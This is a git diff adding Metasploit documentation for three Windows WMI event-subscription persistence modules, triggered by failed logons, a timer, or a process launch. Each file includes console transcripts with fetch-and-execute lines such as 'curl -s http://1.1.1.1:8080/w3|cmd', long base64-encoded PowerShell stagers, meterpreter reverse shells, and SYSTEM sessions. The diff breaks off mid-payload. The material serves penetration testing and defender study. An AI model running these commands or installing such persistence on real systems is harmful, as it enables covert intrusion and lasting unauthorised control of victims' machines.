diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md
new file mode 100644
index 0000000000000..6e5cc5418d7ab
--- /dev/null
+++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_event_log.md
@@ -0,0 +1,158 @@
+## Vulnerable Application
+
+This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+that will query the event log for an EVENT_ID_TRIGGER
+(default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing
+must be enabled on the target for this method to work, this can be enabled using "auditpol.exe /set /subcategory:Logon
+/failure:Enable"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.
+
+Additionally a custom command can be specified to run once the trigger is
+activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_event_log`
+4. Do: `set session #`
+5. Do: `run`
+6. Create a Windows event to trigger the event, such as an SMB Login
+7. You should get a shell.
+
+## Options
+
+### EVENT_ID_TRIGGER
+
+Event ID to trigger the payload. Default: `4625`
+
+### USERNAME_TRIGGER
+
+The username to trigger the payload. Default: `BOB`
+
+### CLASSNAME
+
+WMI event class name. 
Default: `UPDATER`
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Original Shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer : WIN10PROLICENSE
+OS : Windows 10 1909 (10.0 Build 18363).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence Install
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_event_log
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit
+[-] Msf::OptionValidateError One or more options failed to validate: SESSION.
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > set session 1
+session => 1
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > [*] Installing Persistence...
+[*] Powershell command length: 6767
+[-] Compressed size: 14204
+[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit.
+[+] Launching stager:
+[+] - Bytes remaining: 14204
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] - Bytes remaining: 6204
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] Payload successfully staged.
+[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAZwBPAEgAVwBrAEMAQQA0ACcAKwAnADIATwBRAFEAdQBDAFEAQgBTAEUALwAwAHEASABEAFoAWABTAFUAMwBRAHcATwBsAFIAbwBlAEMAcgBhAGoARQBBAGkAMQAnACsAJwBCADcAdABwAHIANgBOADMAVQBXAFUANwBMACsAMwBVAGsASABIADMAbQBsADQATQAzAHcAegBTAFkAQQAxAGwAdwBJAHIAUQBIADMAeQAvAFQAWABvAG4AOABjAGgAbABUAHoATgBTAGwAQwAyAEYAUwB1AFEAbAB1AE0AVgAwAEsAcQBPAFEAZwBtADUAZABxAG0AVwBIAEsAKwBEAHEARgAnACsAJwAxAHMAZAB5AEUAOQBkAGwAUgBJADcAVwA2AHkAbQAvAEcANgA0AFkATQB3AE4AcABvAG4ALwA5AEIAdABjAGgANQAvACsATQA5AFoAaABMAFUAbwB3AEEAMgBhAHUAdwBTAGwAdQBNAEEAQgBzAFkAbQBkADcASwBIAFIAWABvAEMANQB1AEoAaABLAFEANABxAFIARwB3ADIAZQBJAHsAMgB9ADUAbgA5AEsARwBWAHcAQgBwAGsAWAB4AFIASwBVAFMAMQBUAEIAZAB7ADAAfQBKADEAMgBYAE0ANgBlADgARgB4ADUATABEAHoAKwA4AEEAQQBBAEEAewAxAH0AJwApAC0AZgAnAFAAJwAsACcAPQAnACwAJwBiACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Cleaning up 496 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] Persistence installed! 
Call a shell using "smbclient \\\\2.2.2.2\\C$ -U BOB "
+[+] or
+[+] use auxiliary/scanner/smb/smb_login
+[+] run SMBUser=BOB SMBPass= RHOSTS=2.2.2.2
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251118.2636/WIN10PROLICENSE_20251118.2636.rc
+```
+
+Persistence Trigger
+
+```
+msf exploit(windows/persistence/wmi/wmi_event_subscription_event_log) > use auxiliary/scanner/smb/smb_login
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
+msf auxiliary(scanner/smb/smb_login) > run SMBUser=BOB SMBPass=mess_with_the_best_die_like_the_rest RHOSTS=2.2.2.2
+[*] 2.2.2.2:445 - 2.2.2.2:445 - Starting SMB login bruteforce
+[-] 2.2.2.2:445 - 2.2.2.2:445 - Failed: '.\BOB:mess_with_the_best_die_like_the_rest',
+[*] 2.2.2.2:445 - Scanned 1 of 1 hosts (100% complete)
+[*] 2.2.2.2:445 - Bruteforce completed, 0 credentials were successful.
+[*] 2.2.2.2:445 - You can open an SMB session with these credentials and CreateSession set to true
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/smb/smb_login) >
+[*] Sending stage (188998 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50188) at 2025-11-18 19:28:43 -0500
+
+msf auxiliary(scanner/smb/smb_login) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```
diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md
new file mode 100644
index 0000000000000..0cc631315d3ef
--- /dev/null
+++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_interval.md
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+that triggers the payload after the specified CALLBACK_INTERVAL.
+
+If the persistence is not installed, it will keep triggering payloads to spawn.
+
+Additionally a custom command can be specified to run once the trigger is
+activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_interval`
+4. Do: `set session #`
+5. Do: `run`
+6. Wait
+7. You should get a shell.
+
+## Options
+
+### CALLBACK_INTERVAL
+
+Time between callbacks (In milliseconds). Default: `1_800_000` which is 30 minutes
+
+### CLASSNAME
+
+WMI event class name. 
Default: `UPDATER`
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Original Shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:50187) at 2025-11-18 19:25:49 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > sysinfo
+Computer : WIN10PROLICENSE
+OS : Windows 10 1909 (10.0 Build 18363).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence Install
+
+```
+use exploit/windows/persistence/wmi/wmi_event_subscription_interval
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set session 1
+session => 1
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set CALLBACK_INTERVAL 60000
+CALLBACK_INTERVAL => 60000
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > exploit
+[-] Exploit failed: cmd/linux/http/x64/meterpreter/reverse_tcp is not a compatible payload.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 2.2.2.2:4444
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > [*] Installing Persistence...
+[*] Powershell command length: 6851
+[-] Compressed size: 14384
+[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit.
+[+] Launching stager:
+[+] - Bytes remaining: 14384
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] - Bytes remaining: 6384
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] Payload successfully staged.
+[+] Final command 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
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] Cleaning up 4248
+[+] EXECUTING:
+powershell.exe -EncodedCommand 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 -InputFormat None
+[+] Persistence installed! Callback should be in: 30m
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251120.3942/WIN10PROLICENSE_20251120.3942.rc
+[*] Sending stage (188998 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:50541) at 2025-11-20 18:40:45 -0500
+[*] Sending stage (188998 bytes) to 1.1.1.1
+[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:50543) at 2025-11-20 18:41:44 -0500
+msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md
new file mode 100644
index 0000000000000..e4ae346b5c8f9
--- /dev/null
+++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md
@@ -0,0 +1,144 @@
+## Vulnerable Application
+
+This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter
+that triggers the payload when the specified process is started.
+
+Additionally a custom command can be specified to run once the trigger is
+activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a
+high integrity process. It is also recommended to use staged payloads due to powershell script length limitations.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_process`
+4. Do: `set session #`
+5. Do: `run`
+6. Wait
+7. You should get a shell.
+
+## Options
+
+### PROCESS_TRIGGER
+
+The process name to trigger the payload. Default: `CALC.EXE`
+
+### CLASSNAME
+
+WMI event class name. Default: `UPDATER`
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363)
+
+Original Shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe 
http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49758) at 2025-11-22 11:28:54 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+gComputer : WIN10PROLICENSE
+OS : Windows 10 1909 (10.0 Build 18363).
+eArchitecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 2
+Meterpreter : x64/windows
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_process
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set session 1
+session => 1
+msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+ +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > [*] Powershell command length: 6851 +[-] Compressed size: 14136 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14136 +[+] EXECUTING: +powershell.exe -EncodedCommand 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 -InputFormat None +[+] - Bytes remaining: 6136 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQB7ADEAfQBPAGIAawBJAFcAawBDAHsAMQB9ADQAVwBZAFMAWABQAGIAUwBCAEsARgAvADgAcgBjAFAAQgBQAFIAQgAyAHAAegBhAHoAcQBpAEQAdwBrAFIAWABDAHkAUgBkAEgARgBUAGsAeABOAHoANABEAGEAdwBUAFMAMQB1AHkAUgBZAGsALwAnACsAJwBmAHAANQAzAHkAdABRADYAagBrAE4ATAB3AHsAMgB9AFEAUQBGAFUAdQBMADEAKwArAHIASAArAFYAZAAwADkAZgBIACsANwB2AGIAbgBkADMAUAAvADcAOQAyADIAKwBUADMAWQArAC8ALwBEAEYAZgBQAFgAeABkAHIAVwA5ADIAZgAvAC8AUQAwAHUALwA0AHkAKwBSAFQASwBoACsAdQA3AHoANwA4ADgAbQBGAGUARgB5AC8AUgBYAHMAUwB7ADIAfQBqAHAAZQA0AGUASQB4AGgAVgBYAHkAUAA5AGkAQwBHAGQAZABHAE4AZABoAFgAegBLAGsANgBpAE0ANAB7ADIAfQBaADEANwBLAE8AcQAxAHIAUAB5ADQAcgAnACsAJwAzAEwAcgBtAC8AcgBJAHQATwBkAEIAZAA2AFAANQA2AGkAMwBNAGMAbQBpAG8ALwBSADAAZgBNAG8AZgBrAGIAbgBQAHEAWgBKAC8ANwBjAGoAdABoAEcAdgBVAFoAWgA2AFgALwB0ADAAWgA2AHgAegBGAGIAMQBGAGoAJwArACcASwBOADQAagBIAEkAVwBxADYAcABvAHMAZQA2ADYASwBwADUANAB2AGsAegBGAE0AWABaAHQAVwBlAGYAaQBuAFAAVgBtADAAZQB2AEgATwBoAFcAbAByADMAVgB4AEcAOQAwAFUAJwArACcAcwA5AEIANwBzAGwAdgByAGYARwBaADkAMwBaADkARQA5AHoAUgBHAHEAWABqAHsAMgB9AC8AeQAzAHYAeQBZADcAcgBLAEgANQB3
AHIALwA4ADcAVQBaADYAeQAvAHQAZgBvADMAYwBlAG0AaQBqAHIAYQBaAGMAeQBqAFcARwBEADMAQwBEAHYAeABKAHgAVQBwAHUAbABxADMASwBrADYAagA0AC8AdQBQADAAZQAzAEgAcAB6AHEAMAA3AGsAYgB4AEsAbAA3AGYALwBPADcATgBRAG4ASAA4AHsAMgB9AHQAMgBIADUAOQBkADgAcgAvAFcAMQBqACsASgB5AEgAcwBzAG8AeAB0AEYATwArAEYAMgB5AGoAcQA3AFAAeABHAFUAVgBzAHEATwA5ADEALwBNADQAeQAzAEcASQBvADIAagAzAFkANQBJAFUAZgA2ADAAdgBlACcAKwAnAHcAZgBFAGEAWgB2AHcAWAAvAEUASgByAGEALwA5AGQAaABHAE8AbAArAHgAbwA4AFoANgArAFAAeQBGAHYAbQA2AHEAWQBSAEMAZgB4AC8ARABtADYARgBmADgAZgBSAFcAOQB7ADEAfQB2AHUANgBpAHQANQBjAGYAcgBEACsASQB1AGYAMwBaAHgASQA2ADgAZABrAHYAaQBxAFgAagBMAHIANABoAFQANAByAGUAeABYADMAMwB5AE0AbwB4AHUAQwB6AHgAYwBFAHAAOQBGAHAAWAB3AG8ANwBwAHMARQBIAHMAcABZAFYAcwBXAGMAZABSAGQAMQB6AHAALwAyAFMAZABFAEoANQBiADMANABrADMAMwAwAGYATQB4ADYAdQB5AHIAagBZAGwAewAxAH0AcABIADQAcgBEAHMAcABKADkAdgBaAEoAOABmADgAegA3AHkASAAvAEYAZQA4ADMAMwAzAFoAcAA4ADcAcQBQAFQAeAB6AC8AbgBYADMAWgBjAFIAMgAnACsAJwA4AFQAVQAvAHgAWABQAHIAVAB1ACcAKwAnAEMAZQB1AE4AaQBSAHMANAB4AFgALwA4AHEALwBIAFgAZABtAG0ALwBFAHYAOQBmAHkATABmACcAKwAnAHcAOAAwAHoAYwAnACsAJwBkAHkARgA3ADkAZAAyAHkAVgByADYANwArADUAagBXAHgAYQAvAGsALwB6ADkASgBkAGEARAB2AFIAdABpAHQAZQBHADUAcQA0AGEAVQBYAGsAYwBpAGoAOABpAFIALwBuADQAbgAvAHEAcwBHAGwALwBIAHsAMgB9AEYALwA4AEwAYgBDAC8AYgBOAHEAKwBJAFAAdgBzAC8AcgA5AFYAbQB2AGgAVgAyAHIATwB1ADcAewAxAH0AMwBhAGMANgB4ADgATgA0AEUAeAA0AFAATwBEAEYAKwB5AHgAUQBEADgAbAB3AHUAbABCAGYAcQA2AEoAVAAxAHoAMgB3AC8AKwBDAHQAYgBNAFEAWQBQAGkAdQA4AE8ASABNAGkAKwBMAFgARQBVAHYAaQBiAEcANwA1ADUAOABDACcAKwAnADQALwAzAGsAYgBCAEwAOQB7ADIAfQBuAHYAZgAvAHIAOQBTAG4AVQBtACsAeQBjADEAZQBhADMAewAxAH0AMABYAGYAeQB1AGEAUwBlAGwASABmAGgATAA0AEUAUAArAFgAWABEADgANQAzADMAVgBkADUAUwB5AEsANQBIAC8AagAvAGkAZgBwAFMASQA4ADQAQgA2AHYAeQBVAE8AeQBwAC8AegBJAEYAeAA4AGIATwBvAHcAMQA2AFgAegBwADMAegB4AFgAdABuAFAAOQBoAEgAdgBTAHYASABzAGUAUAA4AGgAKwBaADgAWQB4AHcAdgAnACsAJwBaAFIAYgB6AFAAaQBjAHMAcABjAFoAcABVADgARgBFAGkAcgA4AGEAcAA0AHYAQwBGAGUATwA2AEkAZgAzAGMAUQAxADkANQAzAGsATwB1AHsAMgB9AHYASQBjAFAAQwB2AEsAawBlAG4AbwBpAFQAcwBwAC8AaQAzAHsAMgB9AE0AUQB2AEYAcwB7ADIAfQAzAGYAcQBk
AHsAMQB9AFoAdQBUAHMARwA3AG4AcAArAFIAOQB3AGwAOABJAEoAdwBtADYAaQBYAHoAegBvADIALwA0ADcAbgBzAGwASgA4AFAAMQBJAFAAaQAvAFIAeQBkAEQAYgB4AHcAUgBMAHcAdgAzAC8ATQA1AEIAZABmAHkAMwAvAHcAeABKAEkALwBLAGQAMgBJAC8AWABhAGYAVQBkAFIAZQBjAEUAOQBkAEUAUABUACsAeQAzAHMAWgAxADYAWAAnACsAJwAyAGMAcgB4AG4AMQBLAEYAeQB2AEsAOQAxAHIALwArAFQAOAB0ADMASgA5AHkAUwAvADUAYgA5ADQANwA0AEUAWAA0AFAATwAnACsAJwBDAHIARAB3ADcAMABmAHsAMgB9AHYALwBkAHQAUQBCAGUAWQBMAEgAOQBOADIAMQArAGEAUQBHAE4AdwBQADIAWABZAE4AYgB2AFQAZQB1AFYAewAxAH0ALwBhAFoAMgBSAGUAaABpAGYAewAyAH0AeAB3AFIAUAA3AGYARgBqAFUATwBsAC8AeAAwAFgANwB0AFYAbQBIAHUAaQBGAHUAOABPAGsANQBlAGYANABXAHYAVQBSAGMAbgA0AGoARABFAHYANwB1AHUAVQA1AHYAMgBGAGQAeAArADkAcgBVADcAdwBuADUASABYAHEALwBHAGYARwB0AHkAWgA5ADQAWgB7ADIAfQA4ACsAcAA4AFIASgBlAEwAOABrAFgANAByAHIAbABIADcAVABxADUAcAAxAEYAdgBEADIAaABMAHsAMgB9AHAAcgBuADEAdwBlAHYAQgBmADkAVgB3ADMAZABUAHIARwBIAHUAOABuAE8AMQBiAFUAdgArAEkAMgBJAGgANgB5AFgAOQA5AGQATwBEADkAVgBjAGMALwA2AHcAeQByAHoAOQA0AHsAMQB9ADgAeQBjADQAaAA2ADQARwBMAEYATwA0AFQARwAvAE4AUABZAHYALwB2AFgARgBmAHsAMgB9AFUAZgBoAFMAUAA1AHMAYQBCADUAWABzAFUATgB6AGsALwA3AFgAcgBrAC8AegBJAEgAKwBGADEAMwAvAGoALwB6AEgAVQBJAFgAcwBUAFAAeQBzAE0AcAA2ADQAJwArACcAeQBwAFUAKwBWAHAAVwBxAHUAZQBaAE4AZQBNAGYAcQB2ADgAJwArACcAcgAxADAAMwA4AEMAWgAxAGMASQArADkAbgA4AEMAZAArAHMAJwArACcAWQBaACsAMgB5AEkAbAArADQAVABQAEsAZgB2ADEAKwBCAFUALwA0AC8AeAA4ADgATAAxAE4AUwBNAHYAcwB1AGMANwBPAEIAcgBXAEcAVAA4AEwAKwBFAEoAKwBEAFkAeQByAEIAYwAvAE4AaAB4AFAAMwBzAFEAQwBQACcAKwAnAHcAdgBNAE0AWABDAFcAZQB6AC8ARgBMADcAOAAvAG8AJwArACcAbgA3AHgAUAAvAG8AVQB2ADgAYwBzAFIAOABaACcAKwAnAHIAewAxAH0AewAxAH0AOABKAG4AbwBpACsAcAAzAHEAKwBjAHYANQBUADcAUwB0AGQANgA0AHsAMQB9AC8AagBzAEgAcQByAGkAKwAvAHcAMQBwAGEAOABpADEAZABVADcANgB2ADgAdgB2AEkAcQB1ADYALwBlACsAZgBHAFkAZQBLAGwATwBhAHYAWgBYAG4ANwA4AGoAWAArAEwANQBQADUAdQA2AHYALwBQAC8ATgBYADAAdAA2AE0AOQA3AHIAbQB2ADYAagA